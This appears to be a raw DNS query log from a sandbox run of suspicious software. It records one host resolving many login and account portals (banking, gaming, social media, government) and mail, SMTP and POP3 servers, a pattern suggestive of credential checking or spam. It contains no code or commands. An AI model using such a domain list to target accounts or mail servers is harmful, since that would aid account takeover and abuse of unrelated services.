                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.649229050 CET192.168.2.61.1.1.10x4d25Standard query (0)cloud.simplify3d.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.649475098 CET192.168.2.61.1.1.10xc446Standard query (0)ag.ufa9999.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.649727106 CET192.168.2.61.1.1.10x4418Standard query (0)mega.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.652375937 CET192.168.2.61.1.1.10x9c63Standard query (0)eei.uniandes.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.652375937 CET192.168.2.61.1.1.10x3753Standard query (0)signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.652375937 CET192.168.2.61.1.1.10x2a85Standard query (0)chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.652874947 CET192.168.2.61.1.1.10xadcdStandard query (0)hartico.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.653808117 CET192.168.2.61.1.1.10x96f3Standard query (0)mail.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.653808117 CET192.168.2.61.1.1.10x3eddStandard query (0)naukrigulf-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996269941 CET192.168.2.61.1.1.10xc4e8Standard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996345043 CET192.168.2.61.1.1.10x55a7Standard query (0)student.emis.gov.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996411085 CET192.168.2.61.1.1.10x15a1Standard query (0)oferta.senasofiaplus.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996411085 CET192.168.2.61.1.1.10x35e8Standard query (0)mw.redsa.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996412039 CET192.168.2.61.1.1.10x678dStandard query (0)s163-es.ogame.gameforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996464014 CET192.168.2.61.1.1.10x82beStandard query (0)etd.lib.tuke.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996464014 CET192.168.2.61.1.1.10x3eecStandard query (0)nossoplayer.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996464014 CET192.168.2.61.1.1.10x83c3Standard query (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996515036 CET192.168.2.61.1.1.10xd8eeStandard query (0)mitextoescolar.mineduc.clMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996515036 CET192.168.2.61.1.1.10x482fStandard query (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996515036 CET192.168.2.61.1.1.10xb22bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996565104 CET192.168.2.61.1.1.10x6bd5Standard query (0)mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996565104 CET192.168.2.61.1.1.10xd7d5Standard query (0)followerstiktok.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996565104 CET192.168.2.61.1.1.10x2ac9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996608973 CET192.168.2.61.1.1.10x968eStandard query (0)pl-pl.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996608973 CET192.168.2.61.1.1.10xfa74Standard query (0)netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996608973 CET192.168.2.61.1.1.10x15a0Standard query (0)sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996701956 CET192.168.2.61.1.1.10x131dStandard query (0)kamgarsetu.mp.gov.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996751070 CET192.168.2.61.1.1.10xccc9Standard query (0)app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996751070 CET192.168.2.61.1.1.10xdaa4Standard query (0)api.cmrsanmartin.ziz.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996751070 CET192.168.2.61.1.1.10xdc16Standard query (0)foros.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996794939 CET192.168.2.61.1.1.10x9418Standard query (0)21dukes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.996972084 CET192.168.2.61.1.1.10x991aStandard query (0)tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998194933 CET192.168.2.61.1.1.10x3fa4Standard query (0)account.booking.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998194933 CET192.168.2.61.1.1.10x6aaeStandard query (0)poligrafosecuador.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998194933 CET192.168.2.61.1.1.10xfb46Standard query (0)tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998194933 CET192.168.2.61.1.1.10xb2d5Standard query (0)yellosa.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998261929 CET192.168.2.61.1.1.10x11deStandard query (0)innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998297930 CET192.168.2.61.1.1.10x13f3Standard query (0)www2.personas.santander.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998327971 CET192.168.2.61.1.1.10xde01Standard query (0)authenticate.riotgames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998327971 CET192.168.2.61.1.1.10xf8a6Standard query (0)sigapbanjarmasin.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998327971 CET192.168.2.61.1.1.10xf52aStandard query (0)contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998347998 CET192.168.2.61.1.1.10x1093Standard query (0)mobilsam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998409986 CET192.168.2.61.1.1.10xfb54Standard query (0)secure.vexcorp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998409986 CET192.168.2.61.1.1.10x32b3Standard query (0)warriorplus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998410940 CET192.168.2.61.1.1.10x880eStandard query (0)connect.appen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998433113 CET192.168.2.61.1.1.10x1b2Standard query (0)login.adf.lyA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998491049 CET192.168.2.61.1.1.10x2427Standard query (0)srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998491049 CET192.168.2.61.1.1.10xf26cStandard query (0)transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998491049 CET192.168.2.61.1.1.10xa88dStandard query (0)casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998511076 CET192.168.2.61.1.1.10xb755Standard query (0)pt.secure.imvu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998544931 CET192.168.2.61.1.1.10xf381Standard query (0)phonandroid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998544931 CET192.168.2.61.1.1.10xddf5Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998544931 CET192.168.2.61.1.1.10x99b8Standard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998605013 CET192.168.2.61.1.1.10xe277Standard query (0)sport.autoplay.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998605013 CET192.168.2.61.1.1.10xda7aStandard query (0)ngoalongvn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998661041 CET192.168.2.61.1.1.10xbcc0Standard query (0)mojadovera.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998661041 CET192.168.2.61.1.1.10x1f2bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998661041 CET192.168.2.61.1.1.10x736fStandard query (0)accounts.binance.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000325918 CET192.168.2.61.1.1.10x69f3Standard query (0)hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10x6aedStandard query (0)iam.gov.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10x4a2bStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10xf409Standard query (0)brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001163960 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001164913 CET192.168.2.61.1.1.10x348fStandard query (0)netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001208067 CET192.168.2.61.1.1.10x4e2eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10x8114Standard query (0)accounts.snapchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10xbe2eStandard query (0)uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10xcbe5Standard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10x1fe1Standard query (0)mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10x4e92Standard query (0)kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10xbd75Standard query (0)ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001619101 CET192.168.2.61.1.1.10x8981Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001619101 CET192.168.2.61.1.1.10x242Standard query (0)instructory.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.007985115 CET192.168.2.61.1.1.10x9e86Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.036355972 CET192.168.2.61.1.1.10x425fStandard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.041461945 CET192.168.2.61.1.1.10xbd9eStandard query (0)ssc.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.042113066 CET192.168.2.61.1.1.10x5f38Standard query (0)ucv.blackboard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.043030977 CET192.168.2.61.1.1.10x2537Standard query (0)v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.044385910 CET192.168.2.61.1.1.10x2ad6Standard query (0)academico.um.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.044796944 CET192.168.2.61.1.1.10xca7aStandard query (0)login2.innova.puglia.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.046664953 CET192.168.2.61.1.1.10x1597Standard query (0)easygold.joyalukkas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.059272051 CET192.168.2.61.1.1.10x1973Standard query (0)virtuadopt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.059602022 CET192.168.2.61.1.1.10x66b9Standard query (0)s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315401077 CET192.168.2.61.1.1.10xf683Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.354758024 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.367523909 CET192.168.2.61.1.1.10xba4bStandard query (0)cjdropshipping.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.418668032 CET192.168.2.61.1.1.10x88c1Standard query (0)account.mojang.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419008970 CET192.168.2.61.1.1.10xae6fStandard query (0)gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419415951 CET192.168.2.61.1.1.10x7653Standard query (0)pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419452906 CET192.168.2.61.1.1.10xca7aStandard query (0)login2.innova.puglia.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419473886 CET192.168.2.61.1.1.10xbd9eStandard query (0)ssc.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.423913956 CET192.168.2.61.1.1.10xeefaStandard query (0)mx-1.cloudevelops.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.425228119 CET192.168.2.61.1.1.10x87dcStandard query (0)testconnect.garena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.432054043 CET192.168.2.61.1.1.10x2d44Standard query (0)oferta.senasofiaplus.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.433928967 CET192.168.2.61.1.1.10x239dStandard query (0)analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.435918093 CET192.168.2.61.1.1.10x2a11Standard query (0)ov.edesur.com.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.436642885 CET192.168.2.61.1.1.10x5fbaStandard query (0)loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.440608025 CET192.168.2.61.1.1.10x7370Standard query (0)mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.455518007 CET192.168.2.61.1.1.10x11dbStandard query (0)alt2.gmr-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.524302959 CET192.168.2.61.1.1.10x7278Standard query (0)woomar.hostingas.ltA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.525835037 CET192.168.2.61.1.1.10x61bbStandard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.526510000 CET192.168.2.61.1.1.10x9482Standard query (0)mx.sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.528917074 CET192.168.2.61.1.1.10x2034Standard query (0)mx156.hostedmxserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.530006886 CET192.168.2.61.1.1.10xad1aStandard query (0)mail.zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.530560970 CET192.168.2.61.1.1.10xa66Standard query (0)mxa.mailgun.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.531322956 CET192.168.2.61.1.1.10xa198Standard query (0)mail.nossoplayer.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.531833887 CET192.168.2.61.1.1.10x5b5Standard query (0)mxdomain.qq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.532459974 CET192.168.2.61.1.1.10xcb7fStandard query (0)mx3.name.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.534195900 CET192.168.2.61.1.1.10xfe39Standard query (0)mail2.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.534595013 CET192.168.2.61.1.1.10x785bStandard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.535903931 CET192.168.2.61.1.1.10xe7e4Standard query (0)mailgw.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.537056923 CET192.168.2.61.1.1.10x2f2dStandard query (0)mx2.saudi.net.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.668570995 CET192.168.2.61.1.1.10x1b07Standard query (0)uh-is.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.718173027 CET192.168.2.61.1.1.10xf683Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.866997004 CET192.168.2.61.1.1.10xe7e4Standard query (0)mailgw.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.867397070 CET192.168.2.61.1.1.10x5b5Standard query (0)mxdomain.qq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.868467093 CET192.168.2.61.1.1.10x9482Standard query (0)mx.sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.868585110 CET192.168.2.61.1.1.10xa66Standard query (0)mxa.mailgun.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.868609905 CET192.168.2.61.1.1.10xad1aStandard query (0)mail.zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.868657112 CET192.168.2.61.1.1.10x7278Standard query (0)woomar.hostingas.ltA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.891115904 CET192.168.2.61.1.1.10xb325Standard query (0)mxa-00569201.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.901604891 CET192.168.2.61.1.1.10x1c58Standard query (0)mx1.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.953418016 CET192.168.2.61.1.1.10xf6b8Standard query (0)mail.api.cmrsanmartin.ziz.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.957731009 CET192.168.2.61.1.1.10x3678Standard query (0)mx2.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.958110094 CET192.168.2.61.1.1.10x5b7aStandard query (0)relay.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.960150003 CET192.168.2.61.1.1.10xaa35Standard query (0)mail.idp.uitgeverij-deviant.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.960731983 CET192.168.2.61.1.1.10x3f4dStandard query (0)smtp.contribuyente.seniat.gob.veA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.961822033 CET192.168.2.61.1.1.10xcb0dStandard query (0)mail.pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.962447882 CET192.168.2.61.1.1.10x8f68Standard query (0)mail.innovationdevelopment.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.964899063 CET192.168.2.61.1.1.10x669eStandard query (0)mailgate.ro.bongacams.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.965732098 CET192.168.2.61.1.1.10x498eStandard query (0)mail.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.968502045 CET192.168.2.61.1.1.10x80b3Standard query (0)mailgate.signin.rockstargames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.978394985 CET192.168.2.61.1.1.10x2872Standard query (0)pop3.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.978851080 CET192.168.2.61.1.1.10xc930Standard query (0)pop.us04web.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.981348038 CET192.168.2.61.1.1.10xfba7Standard query (0)pop.store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.986443043 CET192.168.2.61.1.1.10xd98dStandard query (0)mail.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.987592936 CET192.168.2.61.1.1.10x195fStandard query (0)gmr-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.997284889 CET192.168.2.61.1.1.10x894dStandard query (0)relay.store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.998186111 CET192.168.2.61.1.1.10x708dStandard query (0)mail.v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.999362946 CET192.168.2.61.1.1.10x816eStandard query (0)mail.account.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.999895096 CET192.168.2.61.1.1.10x3b03Standard query (0)terna.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.008018017 CET192.168.2.61.1.1.10x2ac9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.008111000 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.008158922 CET192.168.2.61.1.1.10x131dStandard query (0)kamgarsetu.mp.gov.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.010289907 CET192.168.2.61.1.1.10x5c3Standard query (0)mx.nexters.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.086096048 CET192.168.2.61.1.1.10x358aStandard query (0)mail.pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.086096048 CET192.168.2.61.1.1.10x2c84Standard query (0)mail.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.087291956 CET192.168.2.61.1.1.10xe433Standard query (0)mail.signup.takendelight.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.088238001 CET192.168.2.61.1.1.10x922aStandard query (0)smtp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.088238001 CET192.168.2.61.1.1.10xeae7Standard query (0)pop3.aeaaamorim.inovarmais.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.088996887 CET192.168.2.61.1.1.10x91c6Standard query (0)mail.servicossociais.caixa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.089252949 CET192.168.2.61.1.1.10xa925Standard query (0)pop.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.089531898 CET192.168.2.61.1.1.10x3ea8Standard query (0)mailgate.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.090523005 CET192.168.2.61.1.1.10x6682Standard query (0)mail.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.090523005 CET192.168.2.61.1.1.10x547aStandard query (0)mailgate.naukrigulf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.091094017 CET192.168.2.61.1.1.10x8fe7Standard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.091489077 CET192.168.2.61.1.1.10xbf68Standard query (0)relay.opsu.terna.netA (IP address)IN (0x0001)false
